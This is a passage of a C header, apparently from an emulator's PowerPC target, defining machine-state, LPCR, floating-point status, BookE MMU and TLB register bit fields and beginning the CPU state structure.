#define MSR_SE 10 /* Single-step trace enable x hflags */ #define MSR_DWE 10 /* Debug wait enable on 405 x */ #define MSR_UBLE 10 /* User BTB lock enable on e500 x */ #define MSR_BE 9 /* Branch trace enable x hflags */ #define MSR_DE 9 /* Debug interrupts enable on embedded PowerPC x */ #define MSR_FE1 8 /* Floating point exception mode 1 hflags */ #define MSR_AL 7 /* AL bit on POWER */ #define MSR_EP 6 /* Exception prefix on 601 */ #define MSR_IR 5 /* Instruction relocate */ #define MSR_DR 4 /* Data relocate */ #define MSR_IS 5 /* Instruction address space (BookE) */ #define MSR_DS 4 /* Data address space (BookE) */ #define MSR_PE 3 /* Protection enable on 403 */ #define MSR_PX 2 /* Protection exclusive on 403 x */ #define MSR_PMM 2 /* Performance monitor mark on POWER x */ #define MSR_RI 1 /* Recoverable interrupt 1 */ #define MSR_LE 0 /* Little-endian mode 1 hflags */ /* LPCR bits */ #define LPCR_VPM0 PPC_BIT(0) #define LPCR_VPM1 PPC_BIT(1) #define LPCR_ISL PPC_BIT(2) #define LPCR_KBV PPC_BIT(3) #define LPCR_DPFD_SHIFT (63 - 11) #define LPCR_DPFD (0x7ull << LPCR_DPFD_SHIFT) #define LPCR_VRMASD_SHIFT (63 - 16) #define LPCR_VRMASD (0x1full << LPCR_VRMASD_SHIFT) /* P9: Power-saving mode Exit Cause Enable (Upper Section) Mask */ #define LPCR_PECE_U_SHIFT (63 - 19) #define LPCR_PECE_U_MASK (0x7ull << LPCR_PECE_U_SHIFT) #define LPCR_HVEE PPC_BIT(17) /* Hypervisor Virt Exit Enable */ #define LPCR_RMLS_SHIFT (63 - 37) #define LPCR_RMLS (0xfull << LPCR_RMLS_SHIFT) #define LPCR_ILE PPC_BIT(38) #define LPCR_AIL_SHIFT (63 - 40) /* Alternate interrupt location */ #define LPCR_AIL (3ull << LPCR_AIL_SHIFT) #define LPCR_UPRT PPC_BIT(41) /* Use Process Table */ #define LPCR_EVIRT PPC_BIT(42) /* Enhanced Virtualisation */ #define LPCR_HR PPC_BIT(43) /* Host Radix */ #define LPCR_ONL PPC_BIT(45) #define LPCR_LD PPC_BIT(46) /* Large Decrementer */ #define LPCR_P7_PECE0 PPC_BIT(49) #define LPCR_P7_PECE1 PPC_BIT(50) #define LPCR_P7_PECE2 PPC_BIT(51) #define LPCR_P8_PECE0 PPC_BIT(47) #define LPCR_P8_PECE1 PPC_BIT(48) #define LPCR_P8_PECE2 PPC_BIT(49) #define LPCR_P8_PECE3 PPC_BIT(50) #define LPCR_P8_PECE4 PPC_BIT(51) /* P9: Power-saving mode Exit Cause Enable (Lower Section) Mask */ #define LPCR_PECE_L_SHIFT 
(63 - 51) #define LPCR_PECE_L_MASK (0x1full << LPCR_PECE_L_SHIFT) #define LPCR_PDEE PPC_BIT(47) /* Privileged Doorbell Exit EN */ #define LPCR_HDEE PPC_BIT(48) /* Hyperv Doorbell Exit Enable */ #define LPCR_EEE PPC_BIT(49) /* External Exit Enable */ #define LPCR_DEE PPC_BIT(50) /* Decrementer Exit Enable */ #define LPCR_OEE PPC_BIT(51) /* Other Exit Enable */ #define LPCR_MER PPC_BIT(52) #define LPCR_GTSE PPC_BIT(53) /* Guest Translation Shootdown */ #define LPCR_TC PPC_BIT(54) #define LPCR_HEIC PPC_BIT(59) /* HV Extern Interrupt Control */ #define LPCR_LPES0 PPC_BIT(60) #define LPCR_LPES1 PPC_BIT(61) #define LPCR_RMI PPC_BIT(62) #define LPCR_HVICE PPC_BIT(62) /* HV Virtualisation Int Enable */ #define LPCR_HDICE PPC_BIT(63) /* PSSCR bits */ #define PSSCR_ESL PPC_BIT(42) /* Enable State Loss */ #define PSSCR_EC PPC_BIT(43) /* Exit Criterion */ /* HFSCR bits */ #define HFSCR_MSGP PPC_BIT(53) /* Privileged Message Send Facilities */ #define HFSCR_IC_MSGP 0xA #define msr_sf ((env->msr >> MSR_SF) & 1) #define msr_isf ((env->msr >> MSR_ISF) & 1) #if defined(TARGET_PPC64) #define msr_hv ((env->msr >> MSR_HV) & 1) #else #define msr_hv (0) #endif #define msr_cm ((env->msr >> MSR_CM) & 1) #define msr_icm ((env->msr >> MSR_ICM) & 1) #define msr_gs ((env->msr >> MSR_GS) & 1) #define msr_ucle ((env->msr >> MSR_UCLE) & 1) #define msr_vr ((env->msr >> MSR_VR) & 1) #define msr_spe ((env->msr >> MSR_SPE) & 1) #define msr_ap ((env->msr >> MSR_AP) & 1) #define msr_vsx ((env->msr >> MSR_VSX) & 1) #define msr_sa ((env->msr >> MSR_SA) & 1) #define msr_key ((env->msr >> MSR_KEY) & 1) #define msr_pow ((env->msr >> MSR_POW) & 1) #define msr_tgpr ((env->msr >> MSR_TGPR) & 1) #define msr_ce ((env->msr >> MSR_CE) & 1) #define msr_ile ((env->msr >> MSR_ILE) & 1) #define msr_ee ((env->msr >> MSR_EE) & 1) #define msr_pr ((env->msr >> MSR_PR) & 1) #define msr_fp ((env->msr >> MSR_FP) & 1) #define msr_me ((env->msr >> MSR_ME) & 1) #define msr_fe0 ((env->msr >> MSR_FE0) & 1) #define msr_se ((env->msr >> MSR_SE) & 1) #define msr_dwe ((env->msr >> MSR_DWE) & 1) #define msr_uble ((env->msr >> MSR_UBLE) & 1) #define msr_be ((env->msr >> MSR_BE) & 1) #define msr_de ((env->msr >> MSR_DE) & 1) #define msr_fe1 ((env->msr >> MSR_FE1) & 1) #define msr_al ((env->msr >> MSR_AL) & 1) #define msr_ep ((env->msr >> MSR_EP) & 1) #define msr_ir ((env->msr >> MSR_IR) & 1) #define msr_dr ((env->msr >> MSR_DR) & 1) #define msr_is ((env->msr >> MSR_IS) & 1) #define msr_ds ((env->msr >> MSR_DS) & 1) #define msr_pe ((env->msr >> MSR_PE) & 1) #define msr_px ((env->msr >> MSR_PX) & 1) #define msr_pmm ((env->msr >> MSR_PMM) & 1) #define msr_ri ((env->msr >> MSR_RI) & 1) #define msr_le ((env->msr >> MSR_LE) & 1) #define msr_ts ((env->msr >> MSR_TS1) & 3) #define msr_tm ((env->msr >> MSR_TM) & 1) #define DBCR0_ICMP (1 << 27) #define DBCR0_BRT (1 << 26) #define DBSR_ICMP (1 << 27) #define DBSR_BRT (1 << 26) /* Hypervisor bit is more specific */ #if defined(TARGET_PPC64) #define MSR_HVB (1ULL << MSR_HV) #else #define MSR_HVB (0ULL) #endif /* DSISR */ #define DSISR_NOPTE 0x40000000 /* Not permitted by access authority of encoded access authority */ #define DSISR_PROTFAULT 0x08000000 #define DSISR_ISSTORE 0x02000000 /* Not permitted by virtual page class key protection */ #define DSISR_AMR 0x00200000 /* Unsupported Radix Tree Configuration */ #define DSISR_R_BADCONFIG 0x00080000 /* SRR1 error code fields */ #define SRR1_NOPTE DSISR_NOPTE /* Not permitted due to no-execute or guard bit set */ #define SRR1_NOEXEC_GUARD 0x10000000 #define SRR1_PROTFAULT 
DSISR_PROTFAULT #define SRR1_IAMR DSISR_AMR /* Facility Status and Control (FSCR) bits */ #define FSCR_EBB (63 - 56) /* Event-Based Branch Facility */ #define FSCR_TAR (63 - 55) /* Target Address Register */ /* Interrupt cause mask and position in FSCR. HFSCR has the same format */ #define FSCR_IC_MASK (0xFFULL) #define FSCR_IC_POS (63 - 7) #define FSCR_IC_DSCR_SPR3 2 #define FSCR_IC_PMU 3 #define FSCR_IC_BHRB 4 #define FSCR_IC_TM 5 #define FSCR_IC_EBB 7 #define FSCR_IC_TAR 8 /* Exception state register bits definition */ #define ESR_PIL PPC_BIT(36) /* Illegal Instruction */ #define ESR_PPR PPC_BIT(37) /* Privileged Instruction */ #define ESR_PTR PPC_BIT(38) /* Trap */ #define ESR_FP PPC_BIT(39) /* Floating-Point Operation */ #define ESR_ST PPC_BIT(40) /* Store Operation */ #define ESR_AP PPC_BIT(44) /* Auxiliary Processor Operation */ #define ESR_PUO PPC_BIT(45) /* Unimplemented Operation */ #define ESR_BO PPC_BIT(46) /* Byte Ordering */ #define ESR_PIE PPC_BIT(47) /* Imprecise exception */ #define ESR_DATA PPC_BIT(53) /* Data Access (Embedded page table) */ #define ESR_TLBI PPC_BIT(54) /* TLB Ineligible (Embedded page table) */ #define ESR_PT PPC_BIT(55) /* Page Table (Embedded page table) */ #define ESR_SPV PPC_BIT(56) /* SPE/VMX operation */ #define ESR_EPID PPC_BIT(57) /* External Process ID operation */ #define ESR_VLEMI PPC_BIT(58) /* VLE operation */ #define ESR_MIF PPC_BIT(62) /* Misaligned instruction (VLE) */ /* Transaction EXception And Summary Register bits */ #define TEXASR_FAILURE_PERSISTENT (63 - 7) #define TEXASR_DISALLOWED (63 - 8) #define TEXASR_NESTING_OVERFLOW (63 - 9) #define TEXASR_FOOTPRINT_OVERFLOW (63 - 10) #define TEXASR_SELF_INDUCED_CONFLICT (63 - 11) #define TEXASR_NON_TRANSACTIONAL_CONFLICT (63 - 12) #define TEXASR_TRANSACTION_CONFLICT (63 - 13) #define TEXASR_TRANSLATION_INVALIDATION_CONFLICT (63 - 14) #define TEXASR_IMPLEMENTATION_SPECIFIC (63 - 15) #define TEXASR_INSTRUCTION_FETCH_CONFLICT (63 - 16) #define TEXASR_ABORT (63 - 31) #define TEXASR_SUSPENDED (63 - 32) #define TEXASR_PRIVILEGE_HV (63 - 34) #define TEXASR_PRIVILEGE_PR (63 - 35) #define TEXASR_FAILURE_SUMMARY (63 - 36) #define TEXASR_TFIAR_EXACT (63 - 37) #define TEXASR_ROT (63 - 38) #define TEXASR_TRANSACTION_LEVEL (63 - 52) /* 12 bits */ enum { POWERPC_FLAG_NONE = 0x00000000, /* Flag for MSR bit 25 signification (VRE/SPE) */ POWERPC_FLAG_SPE = 0x00000001, POWERPC_FLAG_VRE = 0x00000002, /* Flag for MSR bit 17 signification (TGPR/CE) */ POWERPC_FLAG_TGPR = 0x00000004, POWERPC_FLAG_CE = 0x00000008, /* Flag for MSR bit 10 signification (SE/DWE/UBLE) */ POWERPC_FLAG_SE = 0x00000010, POWERPC_FLAG_DWE = 0x00000020, POWERPC_FLAG_UBLE = 0x00000040, /* Flag for MSR bit 9 signification (BE/DE) */ POWERPC_FLAG_BE = 0x00000080, POWERPC_FLAG_DE = 0x00000100, /* Flag for MSR bit 2 signification (PX/PMM) */ POWERPC_FLAG_PX = 0x00000200, POWERPC_FLAG_PMM = 0x00000400, /* Flag for special features */ /* Decrementer clock: RTC clock (POWER, 601) or bus clock */ POWERPC_FLAG_RTC_CLK = 0x00010000, POWERPC_FLAG_BUS_CLK = 0x00020000, /* Has CFAR */ POWERPC_FLAG_CFAR = 0x00040000, /* Has VSX */ POWERPC_FLAG_VSX = 0x00080000, /* Has Transaction Memory (ISA 2.07) */ POWERPC_FLAG_TM = 0x00100000, }; /*****************************************************************************/ /* Floating point status and control register */ #define FPSCR_DRN2 34 /* Decimal Floating-Point rounding control */ #define FPSCR_DRN1 33 /* Decimal Floating-Point rounding control */ #define FPSCR_DRN0 32 /* Decimal Floating-Point rounding 
control */ #define FPSCR_FX 31 /* Floating-point exception summary */ #define FPSCR_FEX 30 /* Floating-point enabled exception summary */ #define FPSCR_VX 29 /* Floating-point invalid operation exception summ. */ #define FPSCR_OX 28 /* Floating-point overflow exception */ #define FPSCR_UX 27 /* Floating-point underflow exception */ #define FPSCR_ZX 26 /* Floating-point zero divide exception */ #define FPSCR_XX 25 /* Floating-point inexact exception */ #define FPSCR_VXSNAN 24 /* Floating-point invalid operation exception (sNan) */ #define FPSCR_VXISI 23 /* Floating-point invalid operation exception (inf) */ #define FPSCR_VXIDI 22 /* Floating-point invalid operation exception (inf) */ #define FPSCR_VXZDZ 21 /* Floating-point invalid operation exception (zero) */ #define FPSCR_VXIMZ 20 /* Floating-point invalid operation exception (inf) */ #define FPSCR_VXVC 19 /* Floating-point invalid operation exception (comp) */ #define FPSCR_FR 18 /* Floating-point fraction rounded */ #define FPSCR_FI 17 /* Floating-point fraction inexact */ #define FPSCR_C 16 /* Floating-point result class descriptor */ #define FPSCR_FL 15 /* Floating-point less than or negative */ #define FPSCR_FG 14 /* Floating-point greater than or negative */ #define FPSCR_FE 13 /* Floating-point equal or zero */ #define FPSCR_FU 12 /* Floating-point unordered or NaN */ #define FPSCR_FPCC 12 /* Floating-point condition code */ #define FPSCR_FPRF 12 /* Floating-point result flags */ #define FPSCR_VXSOFT 10 /* Floating-point invalid operation exception (soft) */ #define FPSCR_VXSQRT 9 /* Floating-point invalid operation exception (sqrt) */ #define FPSCR_VXCVI 8 /* Floating-point invalid operation exception (int) */ #define FPSCR_VE 7 /* Floating-point invalid operation exception enable */ #define FPSCR_OE 6 /* Floating-point overflow exception enable */ #define FPSCR_UE 5 /* Floating-point undeflow exception enable */ #define FPSCR_ZE 4 /* Floating-point zero divide exception enable */ #define FPSCR_XE 3 /* Floating-point inexact exception enable */ #define FPSCR_NI 2 /* Floating-point non-IEEE mode */ #define FPSCR_RN1 1 #define FPSCR_RN0 0 /* Floating-point rounding control */ #define fpscr_drn (((env->fpscr) & FP_DRN) >> FPSCR_DRN0) #define fpscr_fex (((env->fpscr) >> FPSCR_FEX) & 0x1) #define fpscr_vx (((env->fpscr) >> FPSCR_VX) & 0x1) #define fpscr_ox (((env->fpscr) >> FPSCR_OX) & 0x1) #define fpscr_ux (((env->fpscr) >> FPSCR_UX) & 0x1) #define fpscr_zx (((env->fpscr) >> FPSCR_ZX) & 0x1) #define fpscr_xx (((env->fpscr) >> FPSCR_XX) & 0x1) #define fpscr_vxsnan (((env->fpscr) >> FPSCR_VXSNAN) & 0x1) #define fpscr_vxisi (((env->fpscr) >> FPSCR_VXISI) & 0x1) #define fpscr_vxidi (((env->fpscr) >> FPSCR_VXIDI) & 0x1) #define fpscr_vxzdz (((env->fpscr) >> FPSCR_VXZDZ) & 0x1) #define fpscr_vximz (((env->fpscr) >> FPSCR_VXIMZ) & 0x1) #define fpscr_vxvc (((env->fpscr) >> FPSCR_VXVC) & 0x1) #define fpscr_fpcc (((env->fpscr) >> FPSCR_FPCC) & 0xF) #define fpscr_vxsoft (((env->fpscr) >> FPSCR_VXSOFT) & 0x1) #define fpscr_vxsqrt (((env->fpscr) >> FPSCR_VXSQRT) & 0x1) #define fpscr_vxcvi (((env->fpscr) >> FPSCR_VXCVI) & 0x1) #define fpscr_ve (((env->fpscr) >> FPSCR_VE) & 0x1) #define fpscr_oe (((env->fpscr) >> FPSCR_OE) & 0x1) #define fpscr_ue (((env->fpscr) >> FPSCR_UE) & 0x1) #define fpscr_ze (((env->fpscr) >> FPSCR_ZE) & 0x1) #define fpscr_xe (((env->fpscr) >> FPSCR_XE) & 0x1) #define fpscr_ni (((env->fpscr) >> FPSCR_NI) & 0x1) #define fpscr_rn (((env->fpscr) >> FPSCR_RN0) & 0x3) /* Invalid operation exception summary */ #define fpscr_ix 
((env->fpscr) & ((1 << FPSCR_VXSNAN) | (1 << FPSCR_VXISI) | \ (1 << FPSCR_VXIDI) | (1 << FPSCR_VXZDZ) | \ (1 << FPSCR_VXIMZ) | (1 << FPSCR_VXVC) | \ (1 << FPSCR_VXSOFT) | (1 << FPSCR_VXSQRT) | \ (1 << FPSCR_VXCVI))) /* exception summary */ #define fpscr_ex (((env->fpscr) >> FPSCR_XX) & 0x1F) /* enabled exception summary */ #define fpscr_eex (((env->fpscr) >> FPSCR_XX) & ((env->fpscr) >> FPSCR_XE) & \ 0x1F) #define FP_DRN2 (1ull << FPSCR_DRN2) #define FP_DRN1 (1ull << FPSCR_DRN1) #define FP_DRN0 (1ull << FPSCR_DRN0) #define FP_DRN (FP_DRN2 | FP_DRN1 | FP_DRN0) #define FP_FX (1ull << FPSCR_FX) #define FP_FEX (1ull << FPSCR_FEX) #define FP_VX (1ull << FPSCR_VX) #define FP_OX (1ull << FPSCR_OX) #define FP_UX (1ull << FPSCR_UX) #define FP_ZX (1ull << FPSCR_ZX) #define FP_XX (1ull << FPSCR_XX) #define FP_VXSNAN (1ull << FPSCR_VXSNAN) #define FP_VXISI (1ull << FPSCR_VXISI) #define FP_VXIDI (1ull << FPSCR_VXIDI) #define FP_VXZDZ (1ull << FPSCR_VXZDZ) #define FP_VXIMZ (1ull << FPSCR_VXIMZ) #define FP_VXVC (1ull << FPSCR_VXVC) #define FP_FR (1ull << FPSCR_FR) #define FP_FI (1ull << FPSCR_FI) #define FP_C (1ull << FPSCR_C) #define FP_FL (1ull << FPSCR_FL) #define FP_FG (1ull << FPSCR_FG) #define FP_FE (1ull << FPSCR_FE) #define FP_FU (1ull << FPSCR_FU) #define FP_FPCC (FP_FL | FP_FG | FP_FE | FP_FU) #define FP_FPRF (FP_C | FP_FPCC) #define FP_VXSOFT (1ull << FPSCR_VXSOFT) #define FP_VXSQRT (1ull << FPSCR_VXSQRT) #define FP_VXCVI (1ull << FPSCR_VXCVI) #define FP_VE (1ull << FPSCR_VE) #define FP_OE (1ull << FPSCR_OE) #define FP_UE (1ull << FPSCR_UE) #define FP_ZE (1ull << FPSCR_ZE) #define FP_XE (1ull << FPSCR_XE) #define FP_NI (1ull << FPSCR_NI) #define FP_RN1 (1ull << FPSCR_RN1) #define FP_RN0 (1ull << FPSCR_RN0) #define FP_RN (FP_RN1 | FP_RN0) #define FP_ENABLES (FP_VE | FP_OE | FP_UE | FP_ZE | FP_XE) #define FP_STATUS (FP_FR | FP_FI | FP_FPRF) /* the exception bits which can be cleared by mcrfs - includes FX */ #define FP_EX_CLEAR_BITS (FP_FX | FP_OX | FP_UX | FP_ZX | \ FP_XX | FP_VXSNAN | FP_VXISI | FP_VXIDI | \ FP_VXZDZ | FP_VXIMZ | FP_VXVC | FP_VXSOFT | \ FP_VXSQRT | FP_VXCVI) /*****************************************************************************/ /* Vector status and control register */ #define VSCR_NJ 16 /* Vector non-java */ #define VSCR_SAT 0 /* Vector saturation */ /*****************************************************************************/ /* BookE e500 MMU registers */ #define MAS0_NV_SHIFT 0 #define MAS0_NV_MASK (0xfff << MAS0_NV_SHIFT) #define MAS0_WQ_SHIFT 12 #define MAS0_WQ_MASK (3 << MAS0_WQ_SHIFT) /* Write TLB entry regardless of reservation */ #define MAS0_WQ_ALWAYS (0 << MAS0_WQ_SHIFT) /* Write TLB entry only already in use */ #define MAS0_WQ_COND (1 << MAS0_WQ_SHIFT) /* Clear TLB entry */ #define MAS0_WQ_CLR_RSRV (2 << MAS0_WQ_SHIFT) #define MAS0_HES_SHIFT 14 #define MAS0_HES (1 << MAS0_HES_SHIFT) #define MAS0_ESEL_SHIFT 16 #define MAS0_ESEL_MASK (0xfff << MAS0_ESEL_SHIFT) #define MAS0_TLBSEL_SHIFT 28 #define MAS0_TLBSEL_MASK (3 << MAS0_TLBSEL_SHIFT) #define MAS0_TLBSEL_TLB0 (0 << MAS0_TLBSEL_SHIFT) #define MAS0_TLBSEL_TLB1 (1 << MAS0_TLBSEL_SHIFT) #define MAS0_TLBSEL_TLB2 (2 << MAS0_TLBSEL_SHIFT) #define MAS0_TLBSEL_TLB3 (3 << MAS0_TLBSEL_SHIFT) #define MAS0_ATSEL_SHIFT 31 #define MAS0_ATSEL (1 << MAS0_ATSEL_SHIFT) #define MAS0_ATSEL_TLB 0 #define MAS0_ATSEL_LRAT MAS0_ATSEL #define MAS1_TSIZE_SHIFT 7 #define MAS1_TSIZE_MASK (0x1f << MAS1_TSIZE_SHIFT) #define MAS1_TS_SHIFT 12 #define MAS1_TS (1 << MAS1_TS_SHIFT) #define MAS1_IND_SHIFT 13 #define MAS1_IND (1 << 
MAS1_IND_SHIFT) #define MAS1_TID_SHIFT 16 #define MAS1_TID_MASK (0x3fff << MAS1_TID_SHIFT) #define MAS1_IPROT_SHIFT 30 #define MAS1_IPROT (1 << MAS1_IPROT_SHIFT) #define MAS1_VALID_SHIFT 31 #define MAS1_VALID 0x80000000 #define MAS2_EPN_SHIFT 12 #define MAS2_EPN_MASK (~0ULL << MAS2_EPN_SHIFT) #define MAS2_ACM_SHIFT 6 #define MAS2_ACM (1 << MAS2_ACM_SHIFT) #define MAS2_VLE_SHIFT 5 #define MAS2_VLE (1 << MAS2_VLE_SHIFT) #define MAS2_W_SHIFT 4 #define MAS2_W (1 << MAS2_W_SHIFT) #define MAS2_I_SHIFT 3 #define MAS2_I (1 << MAS2_I_SHIFT) #define MAS2_M_SHIFT 2 #define MAS2_M (1 << MAS2_M_SHIFT) #define MAS2_G_SHIFT 1 #define MAS2_G (1 << MAS2_G_SHIFT) #define MAS2_E_SHIFT 0 #define MAS2_E (1 << MAS2_E_SHIFT) #define MAS3_RPN_SHIFT 12 #define MAS3_RPN_MASK (0xfffff << MAS3_RPN_SHIFT) #define MAS3_U0 0x00000200 #define MAS3_U1 0x00000100 #define MAS3_U2 0x00000080 #define MAS3_U3 0x00000040 #define MAS3_UX 0x00000020 #define MAS3_SX 0x00000010 #define MAS3_UW 0x00000008 #define MAS3_SW 0x00000004 #define MAS3_UR 0x00000002 #define MAS3_SR 0x00000001 #define MAS3_SPSIZE_SHIFT 1 #define MAS3_SPSIZE_MASK (0x3e << MAS3_SPSIZE_SHIFT) #define MAS4_TLBSELD_SHIFT MAS0_TLBSEL_SHIFT #define MAS4_TLBSELD_MASK MAS0_TLBSEL_MASK #define MAS4_TIDSELD_MASK 0x00030000 #define MAS4_TIDSELD_PID0 0x00000000 #define MAS4_TIDSELD_PID1 0x00010000 #define MAS4_TIDSELD_PID2 0x00020000 #define MAS4_TIDSELD_PIDZ 0x00030000 #define MAS4_INDD 0x00008000 /* Default IND */ #define MAS4_TSIZED_SHIFT MAS1_TSIZE_SHIFT #define MAS4_TSIZED_MASK MAS1_TSIZE_MASK #define MAS4_ACMD 0x00000040 #define MAS4_VLED 0x00000020 #define MAS4_WD 0x00000010 #define MAS4_ID 0x00000008 #define MAS4_MD 0x00000004 #define MAS4_GD 0x00000002 #define MAS4_ED 0x00000001 #define MAS4_WIMGED_MASK 0x0000001f /* Default WIMGE */ #define MAS4_WIMGED_SHIFT 0 #define MAS5_SGS 0x80000000 #define MAS5_SLPID_MASK 0x00000fff #define MAS6_SPID0 0x3fff0000 #define MAS6_SPID1 0x00007ffe #define MAS6_ISIZE(x) MAS1_TSIZE(x) #define MAS6_SAS 0x00000001 #define MAS6_SPID MAS6_SPID0 #define MAS6_SIND 0x00000002 /* Indirect page */ #define MAS6_SIND_SHIFT 1 #define MAS6_SPID_MASK 0x3fff0000 #define MAS6_SPID_SHIFT 16 #define MAS6_ISIZE_MASK 0x00000f80 #define MAS6_ISIZE_SHIFT 7 #define MAS7_RPN 0xffffffff #define MAS8_TGS 0x80000000 #define MAS8_VF 0x40000000 #define MAS8_TLBPID 0x00000fff /* Bit definitions for MMUCFG */ #define MMUCFG_MAVN 0x00000003 /* MMU Architecture Version Number */ #define MMUCFG_MAVN_V1 0x00000000 /* v1.0 */ #define MMUCFG_MAVN_V2 0x00000001 /* v2.0 */ #define MMUCFG_NTLBS 0x0000000c /* Number of TLBs */ #define MMUCFG_PIDSIZE 0x000007c0 /* PID Reg Size */ #define MMUCFG_TWC 0x00008000 /* TLB Write Conditional (v2.0) */ #define MMUCFG_LRAT 0x00010000 /* LRAT Supported (v2.0) */ #define MMUCFG_RASIZE 0x00fe0000 /* Real Addr Size */ #define MMUCFG_LPIDSIZE 0x0f000000 /* LPID Reg Size */ /* Bit definitions for MMUCSR0 */ #define MMUCSR0_TLB1FI 0x00000002 /* TLB1 Flash invalidate */ #define MMUCSR0_TLB0FI 0x00000004 /* TLB0 Flash invalidate */ #define MMUCSR0_TLB2FI 0x00000040 /* TLB2 Flash invalidate */ #define MMUCSR0_TLB3FI 0x00000020 /* TLB3 Flash invalidate */ #define MMUCSR0_TLBFI (MMUCSR0_TLB0FI | MMUCSR0_TLB1FI | \ MMUCSR0_TLB2FI | MMUCSR0_TLB3FI) #define MMUCSR0_TLB0PS 0x00000780 /* TLB0 Page Size */ #define MMUCSR0_TLB1PS 0x00007800 /* TLB1 Page Size */ #define MMUCSR0_TLB2PS 0x00078000 /* TLB2 Page Size */ #define MMUCSR0_TLB3PS 0x00780000 /* TLB3 Page Size */ /* TLBnCFG encoding */ #define TLBnCFG_N_ENTRY 0x00000fff /* number of entries */ 
#define TLBnCFG_HES 0x00002000 /* HW select supported */ #define TLBnCFG_AVAIL 0x00004000 /* variable page size */ #define TLBnCFG_IPROT 0x00008000 /* IPROT supported */ #define TLBnCFG_GTWE 0x00010000 /* Guest can write */ #define TLBnCFG_IND 0x00020000 /* IND entries supported */ #define TLBnCFG_PT 0x00040000 /* Can load from page table */ #define TLBnCFG_MINSIZE 0x00f00000 /* Minimum Page Size (v1.0) */ #define TLBnCFG_MINSIZE_SHIFT 20 #define TLBnCFG_MAXSIZE 0x000f0000 /* Maximum Page Size (v1.0) */ #define TLBnCFG_MAXSIZE_SHIFT 16 #define TLBnCFG_ASSOC 0xff000000 /* Associativity */ #define TLBnCFG_ASSOC_SHIFT 24 /* TLBnPS encoding */ #define TLBnPS_4K 0x00000004 #define TLBnPS_8K 0x00000008 #define TLBnPS_16K 0x00000010 #define TLBnPS_32K 0x00000020 #define TLBnPS_64K 0x00000040 #define TLBnPS_128K 0x00000080 #define TLBnPS_256K 0x00000100 #define TLBnPS_512K 0x00000200 #define TLBnPS_1M 0x00000400 #define TLBnPS_2M 0x00000800 #define TLBnPS_4M 0x00001000 #define TLBnPS_8M 0x00002000 #define TLBnPS_16M 0x00004000 #define TLBnPS_32M 0x00008000 #define TLBnPS_64M 0x00010000 #define TLBnPS_128M 0x00020000 #define TLBnPS_256M 0x00040000 #define TLBnPS_512M 0x00080000 #define TLBnPS_1G 0x00100000 #define TLBnPS_2G 0x00200000 #define TLBnPS_4G 0x00400000 #define TLBnPS_8G 0x00800000 #define TLBnPS_16G 0x01000000 #define TLBnPS_32G 0x02000000 #define TLBnPS_64G 0x04000000 #define TLBnPS_128G 0x08000000 #define TLBnPS_256G 0x10000000 /* tlbilx action encoding */ #define TLBILX_T_ALL 0 #define TLBILX_T_TID 1 #define TLBILX_T_FULLMATCH 3 #define TLBILX_T_CLASS0 4 #define TLBILX_T_CLASS1 5 #define TLBILX_T_CLASS2 6 #define TLBILX_T_CLASS3 7 /* BookE 2.06 helper defines */ #define BOOKE206_FLUSH_TLB0 (1 << 0) #define BOOKE206_FLUSH_TLB1 (1 << 1) #define BOOKE206_FLUSH_TLB2 (1 << 2) #define BOOKE206_FLUSH_TLB3 (1 << 3) /* number of possible TLBs */ #define BOOKE206_MAX_TLBN 4 #define EPID_EPID_SHIFT 0x0 #define EPID_EPID 0xFF #define EPID_ELPID_SHIFT 0x10 #define EPID_ELPID 0x3F0000 #define EPID_EGS 0x20000000 #define EPID_EGS_SHIFT 29 #define EPID_EAS 0x40000000 #define EPID_EAS_SHIFT 30 #define EPID_EPR 0x80000000 #define EPID_EPR_SHIFT 31 /* We don't support EGS and ELPID */ #define EPID_MASK (EPID_EPID | EPID_EAS | EPID_EPR) /*****************************************************************************/ /* Server and Embedded Processor Control */ #define DBELL_TYPE_SHIFT 27 #define DBELL_TYPE_MASK (0x1f << DBELL_TYPE_SHIFT) #define DBELL_TYPE_DBELL (0x00 << DBELL_TYPE_SHIFT) #define DBELL_TYPE_DBELL_CRIT (0x01 << DBELL_TYPE_SHIFT) #define DBELL_TYPE_G_DBELL (0x02 << DBELL_TYPE_SHIFT) #define DBELL_TYPE_G_DBELL_CRIT (0x03 << DBELL_TYPE_SHIFT) #define DBELL_TYPE_G_DBELL_MC (0x04 << DBELL_TYPE_SHIFT) #define DBELL_TYPE_DBELL_SERVER (0x05 << DBELL_TYPE_SHIFT) #define DBELL_BRDCAST PPC_BIT(37) #define DBELL_LPIDTAG_SHIFT 14 #define DBELL_LPIDTAG_MASK (0xfff << DBELL_LPIDTAG_SHIFT) #define DBELL_PIRTAG_MASK 0x3fff #define DBELL_PROCIDTAG_MASK PPC_BITMASK(44, 63) #define PPC_PAGE_SIZES_MAX_SZ 8 struct ppc_radix_page_info { uint32_t count; uint32_t entries[PPC_PAGE_SIZES_MAX_SZ]; }; /*****************************************************************************/ /* The whole PowerPC CPU context */ /* * PowerPC needs eight modes for different hypervisor/supervisor/guest * + real/paged mode combinations. The other two modes are for * external PID load/store. 
 */
#define PPC_TLB_EPID_LOAD 8
#define PPC_TLB_EPID_STORE 9

#define PPC_CPU_OPCODES_LEN          0x40
#define PPC_CPU_INDIRECT_OPCODES_LEN 0x20

struct CPUPPCState {
    /* Most commonly used resources during translated code execution first */
    target_ulong gpr[32];  /* general purpose registers */
    target_ulong gprh[32]; /* storage for GPR MSB, used by the SPE extension */
    target_ulong lr;
    target_ulong ctr;
    uint32_t crf[8];       /* condition register */
#if defined(TARGET_PPC64)
    target_ulong cfar;
#endif
    target_ulong xer;      /* XER (with SO, OV, CA split out) */
    target_ulong so;
    target_ulong ov;
    target_ulong ca;
    target_ulong ov32;
    target_ulong ca32;

    target_ulong reserve_addr; /* Reservation address */
    target_ulong reserve_val;  /* Reservation value */
    target_ulong reserve_val2;

    /* These are used in supervisor mode only */
    target_ulong msr;      /* machine state register */
    target_ulong tgpr[4];  /* temporary general purpose registers, */
                           /* used to speed-up TLB assist handlers */

    target_ulong nip;      /* next instruction pointer */
    uint64_t retxh;        /* high part of 128-bit helper return */

    /* when a memory exception occurs, the access type is stored here */
    int access_type;

    /* MMU context, only relevant for full system emulation */
#if defined(TARGET_PPC64)
    ppc_slb_t slb[MAX_SLB_ENTRIES]; /* PowerPC 64 SLB area */
#endif
    target_ulong sr[32];   /* segment registers */
    uint32_t nb_BATs;      /* number of BATs */
    target_ulong DBAT[2][8];
    target_ulong IBAT[2][8];
    /* PowerPC TLB registers (for 4xx, e500 and 60x software driven TLBs) */
    int32_t nb_tlb;  /* Total number of TLB */
    int tlb_per_way; /* Speed-up helper: used to avoid divisions at run time */
